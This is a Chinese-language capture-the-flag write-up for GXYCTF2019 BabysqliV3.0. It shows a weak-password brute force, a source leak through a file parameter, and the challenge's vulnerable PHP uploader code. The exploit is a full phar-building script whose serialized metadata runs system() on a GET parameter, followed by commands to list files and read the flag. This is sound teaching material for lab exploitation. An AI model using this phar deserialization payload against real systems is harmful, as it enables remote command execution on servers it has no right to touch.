目录
3.代码审计
[GXYCTF2019]BabysqliV3.0
思路详解
知识点:弱密码,伪协议,php反序列化
解题过程:
1.弱密码
输入admin/任意密码,显示密码错误
bp爆破密码显示password
2.伪协议
特征:file
文件名后缀php,显示
home/upload获取home.php和upload.php
$_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
$file = $_GET['file'].".php";
<?php
error_reporting(0);
class Uploader{
public $Filename;
public $cmd;
public $token;
function __construct(){
$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
$ext = ".txt";
@mkdir($sandbox, 0777, true);
if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
$this->Filename = $_GET['name'];
}
else{
$this->Filename = $sandbox.$_SESSION['user'].$ext;
}
$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
$this->token = $_SESSION['user'];
}
function upload($file){
global $sandbox;
global $ext;
if(preg_match("[^a-z0-9]", $this->Filename)){
$this->cmd = "die('illegal filename!');";
}
else{
if($file['size'] > 1024){
$this->cmd = "die('you are too big (′▽`〃)');";
}
else{
$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
}
}
}
function __toString(){
global $sandbox;
global $ext;
// return $sandbox.$this->Filename.$ext;
return $this->Filename;
}
function __destruct(){
if($this->token != $_SESSION['user']){
$this->cmd = "die('check token falied!');";
}
eval($this->cmd);
}
}
if(isset($_FILES['file'])) {
$uploader = new Uploader();
$uploader->upload($_FILES["file"]);
if(@file_get_contents($uploader)){
echo "下面是你上传的文件:<br>".$uploader."<br>";
echo file_get_contents($uploader);
}
}
?>
代码审计
file+php=$file
function上传:
路径:
/uploads/md5($_SESSION['user'])/$_SESSION['user'].$ext
规则:
反序列化:_destruct:销毁执行函数
$this->Filename = $sandbox.$_SESSION['user'].$ext;
eval($this->cmd);
文件读取:
echo file_get_contents($uploader);
利用点:
eval($this->cmd);
echo file_get_contents($uploader);
cmd=获取flag命令或者写入一句话木马命令
echo file_get_contents($uploader):
file_get_contents($uploader)读取文件:
echo:写入
文件:phar.php
<?php
class Uploader{
public $Filename = 'aaa';
//public $cmd ='echo phpinfo();';//可先用此测试
public $cmd ='echo system($_GET["hack"]);';//传递一个可控hack参数
public $token ='GXY4de07d94caf018e1453439fff2b2375b';//先上串一个合法文件得到session['user']
}
@unlink("demo.phar");
$phar = new Phar("demo.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF8a<?php __HALT_COMPILER();?>");
$o = new Uploader();
$phar -> setMetadata($o);//将自定义的meta-data存入manifest
$phar -> addFromString("text.txt","test");//添加要压缩的文件
//签名自动计算
$phar -> stopBuffering();
?>
流程:
1.php执行文件->phar
2.上传文件保存
3.phar读取此文件序列化文件
4.定义uploader:
5.filename token 执行_destruct ---------$this-cmd->$cmd->echo system($_GET["hack"])
6.hack=ls
7.hack=cat flag